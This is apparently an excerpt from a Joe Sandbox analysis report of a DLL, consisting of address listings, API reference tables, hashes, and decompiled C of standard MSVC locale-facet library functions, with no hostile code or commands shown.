                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F03E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F048
                          • int.LIBCPMT ref: 6E20F05F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20F082
                          • std::_Facet_Register.LIBCPMT ref: 6E20F099
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F0B9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F0D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID: hm,n
                          • API String ID: 2363045490-216170354
                          • Opcode ID: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction ID: 8519a0802e7460ad01b3930bf57e452b782981e6e66726a5dec00c1ad9930e6d
                          • Opcode Fuzzy Hash: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction Fuzzy Hash: 8C110676D0051ECBCF00DBE0C894AEEB7BBAF84715F240908E4106B2D4DBB59A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t178 =  *0x6e2c6cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1E161C(0x6e2c6b38);
				_t133 = _a8;
				_t64 = E6E1E171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t173, _t178, 0x14);
							E6E206653( &_v20, 0);
							_t179 =  *0x6e2c6ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1E161C(0x6e2c6cb8);
							_t140 = _a8;
							_t174 = E6E1E171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t130, _t174, _t179, 0x14);
										E6E206653( &_v20, 0);
										_t180 =  *0x6e2c6cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1E161C(0x6e2c6cbc);
										_t147 = _a8;
										_t175 = E6E1E171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t130, _t175, _t180, 0x14);
													E6E206653( &_v20, 0);
													_t181 =  *0x6e2c6cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1E161C(0x6e2c6cc0);
													_t154 = _a8;
													_t176 = E6E1E171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1E1438(_t158);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e26ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E206FD3(__eflags, _t176);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e2c6cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E206FD3(__eflags, _t175);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e2c6cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E206FD3(__eflags, _t174);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e2c6ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E206FD3(__eflags, _t173);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e2c6cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}






















                          0x6e20a0ff
                          0x6e20a0ff
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a130
                          0x6e20a135
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A106
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A110
                          • int.LIBCPMT ref: 6E20A127
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20A14A
                          • std::_Facet_Register.LIBCPMT ref: 6E20A161
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A181
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A19F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: 8k,n
                          • API String ID: 1394824916-3277982818
                          • Opcode ID: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction ID: b6c44b0feb4037195d911b7b5e00fb8f9856d6b3a6d158228e63df7fbba6607d
                          • Opcode Fuzzy Hash: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction Fuzzy Hash: A011A3B5A1051D9BCF01DBE4C898AEDB77BAF44B14F140919E4106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t858 - 0x14, 0);
				_t819 =  *0x6e2c6dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1E161C(0x6e2c6b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E2066BA(_t858 - 0x14);
					return E6E220075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E210E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t858 - 0x20);
							E6E223D74(_t858 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t799, _t819, 0x14);
							E6E206653(_t858 - 0x14, 0);
							_t820 =  *0x6e2c6de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1E161C(0x6e2c6d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E2066BA(_t858 - 0x14);
								return E6E220075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E210EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t858 - 0x20);
										E6E223D74(_t858 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t606, _t800, _t820, 0x14);
										E6E206653(_t858 - 0x14, 0);
										_t821 =  *0x6e2c6db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1E161C(0x6e2c6d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E2066BA(_t858 - 0x14);
											return E6E220075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E210F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t858 - 0x20);
													E6E223D74(_t858 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t606, _t801, _t821, 0x14);
													E6E206653(_t858 - 0x14, 0);
													_t822 =  *0x6e2c6dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1E161C(0x6e2c6d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E2066BA(_t858 - 0x14);
														return E6E220075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E210F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t858 - 0x20);
																E6E223D74(_t858 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t606, _t802, _t822, 0x14);
																E6E206653(_t858 - 0x14, 0);
																_t823 =  *0x6e2c6dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1E161C(0x6e2c6d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E2066BA(_t858 - 0x14);
																	return E6E220075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E210FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t858 - 0x20);
																			E6E223D74(_t858 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t606, _t803, _t823, 0x14);
																			E6E206653(_t858 - 0x14, 0);
																			_t824 =  *0x6e2c6df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1E161C(0x6e2c6d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E2066BA(_t858 - 0x14);
																				return E6E220075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E211057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t858 - 0x20);
																						E6E223D74(_t858 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t606, _t804, _t824, 0x14);
																						E6E206653(_t858 - 0x14, 0);
																						_t825 =  *0x6e2c6dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1E161C(0x6e2c6d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E2066BA(_t858 - 0x14);
																							return E6E220075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E2110BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t858 - 0x20);
																									E6E223D74(_t858 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t606, _t805, _t825, 0x14);
																									E6E206653(_t858 - 0x14, 0);
																									_t826 =  *0x6e2c6df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1E161C(0x6e2c6da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E2066BA(_t858 - 0x14);
																										return E6E220075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E211127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t858 - 0x20);
																												E6E223D74(_t858 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t606, _t806, _t826, 0x14);
																												E6E206653(_t858 - 0x14, 0);
																												_t827 =  *0x6e2c6df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1E161C(0x6e2c6da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E2066BA(_t858 - 0x14);
																													return E6E220075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E2111AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t858 - 0x20);
																															E6E223D74(_t858 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t606, _t807, _t827, 0x14);
																															E6E206653(_t858 - 0x14, 0);
																															_t828 =  *0x6e2c6dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1E161C(0x6e2c6d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E2066BA(_t858 - 0x14);
																																return E6E220075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E211230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t858 - 0x20);
